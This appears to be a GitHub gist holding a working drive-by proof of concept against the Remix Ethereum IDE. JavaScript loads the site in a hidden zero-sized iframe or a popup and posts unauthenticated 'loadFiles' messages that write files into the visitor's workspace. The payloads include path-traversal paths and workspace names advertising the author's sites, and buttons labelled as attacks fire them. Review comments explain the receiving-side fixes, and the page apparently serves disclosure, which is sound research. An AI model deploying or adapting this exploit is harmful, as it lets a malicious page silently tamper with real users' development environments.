
@tintinweb
Created March 27, 2021 17:41
remix drive-by vulnerability (iframe; optional window)
<head>
<script>
/**
 * Embed https://remix.ethereum.org/ in a zero-sized iframe and report its window.
 *
 * The frame is appended to document.body with width and height of 0px. When
 * its "load" event fires, `cb` is called with the frame's contentWindow, then
 * called once more 10 seconds later; 5 seconds after that second call the
 * frame is removed from its parent again.
 *
 * Defensive reading: this only works when the target lets other origins frame
 * it. A site that does not need to be embedded can refuse framing with
 * `Content-Security-Policy: frame-ancestors` or `X-Frame-Options`.
 *
 * @param {function(Window): void} cb - invoked with the iframe's contentWindow.
 * @returns {HTMLIFrameElement} the iframe element that was appended.
 */
function newHiddenIframe(cb) {
  const frame = document.createElement("iframe");

  const notify = () => {
    cb(frame.contentWindow);
  };
  const detach = () => {
    frame.parentNode.removeChild(frame);
  };

  frame.addEventListener("load", () => {
    notify();
    // Second notification 10 s after load, clean-up 5 s after that.
    setTimeout(() => {
      notify();
      setTimeout(detach, 5000);
    }, 10000);
  });

  frame.setAttribute("src", "https://remix.ethereum.org/");
  frame.style.width = "0px";
  frame.style.height = "0px";
  document.body.appendChild(frame);
  return frame;
}
/**
 * Open https://remix.ethereum.org/ in a new browsing context.
 *
 * Unlike the iframe variant this does not depend on the target allowing itself
 * to be framed, so anti-framing headers alone do not cover this path; the
 * receiving page still has to validate who sent it a message.
 *
 * @param {*} cb - accepted but not used by this function.
 * @returns {Window|null} whatever window.open returns.
 */
function newWindow(cb) {
  const opened = window.open("https://remix.ethereum.org/", undefined);
  return opened;
}
/**
 * Post a single-file "loadFiles" message to the given window.
 *
 * The message is a two-element array: the string "loadFiles" and a map from
 * file path to `{ content }`. It is sent with target origin "*".
 *
 * NOTE(review): the receiving handler is not shown on this page; the
 * demonstration presumably relied on it acting on the message without checking
 * the sender. The fix belongs on the receiving side: a "message" listener
 * should compare `event.origin` (and, where relevant, `event.source`) against
 * an allowlist before performing any file operation.
 *
 * @param {Window} remix - window object that receives the message.
 */
function createOneFile(remix) {
  const files = {
    ".workspaces/default_workspace/1_visit___github.com_tintinweb.sol": { content: "boom!" },
  };
  remix.postMessage(["loadFiles", files], "*");
}
/**
 * Post a multi-file "loadFiles" message to the given window.
 *
 * Same message shape as the single-file variant, sent with target origin "*".
 * The keys cover several path shapes: folders under ".workspaces/", a
 * dot-prefixed folder, a path containing "../" segments, a leading "/", and a
 * bare file name.
 *
 * Several keys are repeated verbatim in this copy. A repeated key in an object
 * literal overwrites the earlier entry, so the message carries 12 distinct
 * paths. NOTE(review): the repeats may have differed in whitespace before the
 * page was extracted; that cannot be determined from here.
 *
 * Defensive reading: besides checking `event.origin`, a receiver that accepts
 * file paths from a message should canonicalise them and confine them to the
 * intended workspace root before writing.
 *
 * @param {Window} remix - window object that receives the message.
 */
function createMultipleWorkspaces(remix) {
  const files = {
    ".workspaces/default_workspace/2_workspace_test.sol": { content: "boom!" },
    ".workspaces/my_new_workspace/2_workspace_test.sol": { content: "boom!" },
    ".workspaces/localhost/2_workspace_test.sol": { content: "boom!" },
    ".workspaces/localhost/2_workspace_test.sol": { content: "boom!" },
    ".workspaces/localhost/2_workspace_test.sol": { content: "boom!" },
    ".workspaces/localhost/2_workspace_test.sol": { content: "boom!" },
    ".workspaces/- visit github.com_tintinweb -/2_workspace_test.sol": { content: "boom!" },
    ".workspaces/- visit www.oststrom.com -/2_workspace_test.sol": { content: "boom!" },
    ".workspaces/- connect to localhost -/2_workspace_test.sol": { content: "boom!" },
    ".workspaces/- connect to localhost - /2_workspace_test.sol": { content: "boom!" },
    ".workspaces/- connect to localhost - /2_workspace_test.sol": { content: "boom!" },
    ".workspaces/- connect to localhost - /2_workspace_test.sol": { content: "boom!" },
    ".workspaces/- connect to localhost - /2_workspace_test.sol": { content: "boom!" },
    ".workspaces/- connect to localhost - /2_workspace_test.sol": { content: "boom!" },
    ".hiddenFile/somedir/somesubdir/../../blubb/2_workspace_test.sol": { content: "boom!" },
    ".hiddenFile/somedir/somesubdir/../../blubb/2_workspace_test.sol": { content: "boom!" },
    ".localhost/2_workspace_test.sol": { content: "boom!" },
    "localhost/2_workspace_test.sol": { content: "boom!" },
    "/2_workspace_test.sol": { content: "boom!" },
    "2_workspace_test.sol": { content: "boom2!" },
  };
  remix.postMessage(["loadFiles", files], "*");
}
// Demo trigger, wired to the first button on the page: embeds the target in a
// hidden iframe and, each time the helper calls back, posts the single-file
// "loadFiles" message to that frame's window.
window.attack_iframe_1 = function () {
  const frame = newHiddenIframe(() => {
    createOneFile(frame.contentWindow);
  });
};
// Demo trigger, wired to the second button on the page: same hidden-iframe
// flow as the single-file demo, but posts the multi-path "loadFiles" message.
window.attack_iframe_workspaces = function () {
  const frame = newHiddenIframe(() => {
    createMultipleWorkspaces(frame.contentWindow);
  });
};
// Window-based variant of the single-file demo. No button on the page calls
// it. It opens the target in a new window, registers a "load" listener on the
// returned handle, and from a zero-delay timeout posts the single-file message
// and closes the window.
window.attack_window_1 = function () {
  const popup = newWindow();
  popup.addEventListener("load", () => {
    setTimeout(() => {
      createOneFile(popup);
      popup.close();
    });
  });
};
// Window-based variant of the multi-path demo. No button on the page calls
// it. It opens the target in a new window, registers a "load" listener on the
// returned handle, and from a zero-delay timeout posts the multi-path message
// and closes the window.
window.attack_window_workspace = function () {
  const popup = newWindow();
  popup.addEventListener("load", () => {
    setTimeout(() => {
      createMultipleWorkspaces(popup);
      popup.close();
    });
  });
};
</script>
</head>
<hr>
Click one of the buttons, wait 15 seconds for the magic to unfold, and then go to https://remix.ethereum.org.
<hr>
<div>
<button onclick="attack_iframe_1()">Attack #1 - Drop a file in the remix workspace</button>
<button onclick="attack_iframe_workspaces()">Attack #2 - Mess with the workspace :D</button>
</div>
<hr>